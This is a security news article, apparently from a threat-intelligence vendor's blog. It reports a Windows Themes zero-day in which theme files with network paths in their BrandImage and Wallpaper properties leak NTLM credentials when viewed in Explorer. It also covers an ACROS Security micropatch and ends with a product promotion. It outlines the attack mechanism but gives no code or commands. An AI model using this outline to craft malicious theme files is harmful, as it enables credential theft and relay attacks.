A newly identified zero-day vulnerability in Windows Themes files has raised significant concerns regarding the security of users’ NTLM credentials, creating a pathway for potential remote credential theft. Despite Microsoft’s recent attempts to mitigate similar vulnerabilities, a notable security gap persists, enabling attackers to exploit this flaw simply by having a malicious theme file viewed in Windows Explorer. This alarming discovery was reported by researchers at ACROS Security, underscoring the ongoing threats that Windows users face from NTLM-related exploits.
New Bypass Detected by ACROS Security
Initially, Microsoft addressed the issue with a patch for CVE-2024-21320 in January, targeting NTLM leaks. However, Akamai researcher Tomer Peled uncovered that attackers could circumvent this patch, leading to the emergence of CVE-2024-38030. Through this vulnerability, malicious theme files can transmit network requests containing NTLM credentials to remote attackers without requiring any interaction from the user.
ACROS Security’s findings reveal yet another bypass of Microsoft’s patch that impacts fully updated Windows systems, including Windows 11 24H2. To provide immediate relief, ACROS Security has released a temporary micropatch via their 0patch service, enabling users to safeguard their systems until an official patch is rolled out. This vulnerability affects both legacy and supported versions of Windows Workstation.
How the Zero-Day Attack Works
The mechanism of this zero-day attack involves malicious theme files that incorporate network paths for properties like BrandImage and Wallpaper. When these files are displayed in Explorer, Windows inadvertently sends NTLM authentication requests to remote hosts. This NTLM leak is present across multiple Windows versions, from Windows 7 to Windows 11 24H2, allowing attackers to execute NTLM relay and pass-the-hash attacks, facilitating lateral movement within compromised networks. ACROS Security’s temporary patch addresses this issue by ensuring that Windows systems accurately detect network paths within theme files, effectively preventing NTLM leaks.
How the Micropatch Works
In light of the Windows Themes zero-day vulnerability, ACROS Security has introduced a micropatch that effectively halts NTLM credential leaks triggered by malicious theme files. This micropatch specifically targets network paths in Windows Explorer that would typically initiate a network request to an attacker’s machine when a compromised theme file is viewed. By accurately identifying these network paths, the patch prevents the unauthorized sharing of NTLM credentials, ensuring that no illicit connections are established.
A demonstration on YouTube illustrates the vulnerability on two fully updated Windows 11 24H2 computers. The first PC generates a malicious theme file and transfers it to the second, unpatched PC. Merely copying this file to the unpatched PC’s desktop triggers a network connection, sending NTLM credentials to the attacker’s machine without any additional actions required. However, with the 0patch micropatch installed, the same file transfer does not lead to a connection. Instead, the micropatch identifies and blocks the network path within the theme file, safeguarding credentials from compromise. This real-time, targeted patch exemplifies the effectiveness of 0patch’s solution, providing a proactive measure even before Microsoft issues an official fix.
Stay Ahead with SOCRadar’s Vulnerability Intelligence
As new vulnerabilities continue to surface daily, taking proactive measures is essential for securing your organization’s digital landscape. SOCRadar Vulnerability Intelligence equips you with the necessary tools to stay ahead of potential threats. This feature aids in identifying and prioritizing critical vulnerabilities, offering real-time alerts and actionable insights before attackers can exploit them.
The SOCRadar Vulnerability Intelligence Module ensures that your resources are directed toward the most pressing vulnerabilities, facilitating quicker patching and helping maintain robust security. With SOCRadar, you’ll consistently be one step ahead, fortifying your organization against the latest threats.
